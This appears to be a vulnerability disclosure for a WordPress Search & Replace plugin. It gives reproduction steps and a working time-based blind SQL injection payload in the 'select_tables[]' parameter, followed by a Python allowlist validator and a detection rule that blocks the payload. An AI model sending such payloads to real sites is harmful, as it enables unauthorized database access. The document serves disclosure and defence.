1. Go to the Tools menu in the WordPress admin dashboard
2. Select Search & Replace
3. Click "Do Search & Replace"
4. Change the parameters and intercept the request
5. Put a SQL injection payload in the request (here in the `select_tables[]` parameter), such as the following: `search=123&replace=1&csv=1&select_tables%5B%5D=(SELECT+9255+FROM+(SELECT(SLEEP(1-(IF(44=44,0,5)))))cCQl)&export_or_save=1&action=search-replace&search-submit=123123"asdasd=''&insr_nonce=0590310227&_wp_http_referer=%2Fwp-admin%2Ftools.php%3Fpage%3Dsearch-replace`
6. Notice that the response takes twice as many seconds as the number x you insert in `SLEEP(x-...)`.
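
A check that rejects the request from step 5 before any query is built, as an added example (not the plugin's own code): each `select_tables[]` value must be a plain table identifier and must match a table that actually exists. The function name, the identifier pattern and the table list are assumptions, and the sample bodies are trimmed or constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Assumption: only unquoted MySQL identifiers are legitimate table names here.
TABLE_NAME_RE = re.compile(r"[A-Za-z0-9_$]{1,64}")

# Constructed allowlist; a real check would load it from the database
# (for example the result of SHOW TABLES) instead of hard-coding it.
KNOWN_TABLES = {"wp_posts", "wp_postmeta", "wp_options", "wp_users"}

# Body from step 5, trimmed to the fields that matter for the check.
STEP5_BODY = (
    "search=123&replace=1&csv=1"
    "&select_tables%5B%5D=(SELECT+9255+FROM+(SELECT(SLEEP(1-(IF(44=44,0,5)))))cCQl)"
    "&export_or_save=1&action=search-replace"
)

# Constructed benign request selecting two real tables.
BENIGN_BODY = (
    "search=old&replace=new&csv=1"
    "&select_tables%5B%5D=wp_posts&select_tables%5B%5D=wp_options"
    "&export_or_save=1&action=search-replace"
)


def check_select_tables(body: str, known_tables: set) -> list:
    """Return (value, reason) for every select_tables[] entry to reject."""
    # parse_qs URL-decodes keys and values, so %5B%5D becomes [] and + a space.
    params = parse_qs(body, keep_blank_values=True)
    findings = []
    for value in params.get("select_tables[]", []):
        if not TABLE_NAME_RE.fullmatch(value):
            # Parentheses, spaces, commas, etc. can never be part of a table name.
            findings.append((value, "not a plain table identifier"))
        elif value not in known_tables:
            # Well-formed but unknown names are refused as well (allowlist).
            findings.append((value, "not an existing table"))
    return findings


if __name__ == "__main__":
    for name, body in (("step 5", STEP5_BODY), ("benign", BENIGN_BODY)):
        findings = check_select_tables(body, KNOWN_TABLES)
        print(name, "->", "REJECT" if findings else "ok", findings)
```

The same validation works as a detection rule over logged request bodies: any `select_tables[]` value that fails the identifier pattern is worth an alert.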